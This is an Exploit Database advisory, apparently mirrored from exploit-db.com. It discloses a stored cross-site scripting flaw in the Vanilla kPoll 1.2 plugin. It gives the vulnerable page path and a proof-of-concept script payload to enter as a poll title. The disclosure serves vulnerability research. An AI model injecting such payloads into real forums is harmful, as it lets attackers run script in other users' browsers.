vanilla kpoll plugin 1.2 – Persistent Cross-Site Scripting

• Exploit Database
• 11 阅读

• 作者： Henry Hoggard
  日期： 2012-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19003/

• # Title: Vanilla kPoll 1.2 Stored XSS
  # Date: 5/6/12
  # Author: Henry Hoggard
  # Author URL: henryhoggard.co.uk
  # Author Twitter: @henryhoggard
  # Software: Vanilla Version 2.0.18.4 + Vanilla kPoll 1.2
  # http://vanillaforums.org/download
  # http://vanillaforums.org/addon/kpoll-plugin
  
  To Create the XSS go to this link,
  
  http://vanilla.tld/index.php?p=/plugin/kPoll
  
  Post your XSS as the poll title.
  
  The XSS I used is
  <script>alert('xss')</script>
  
  #############################################################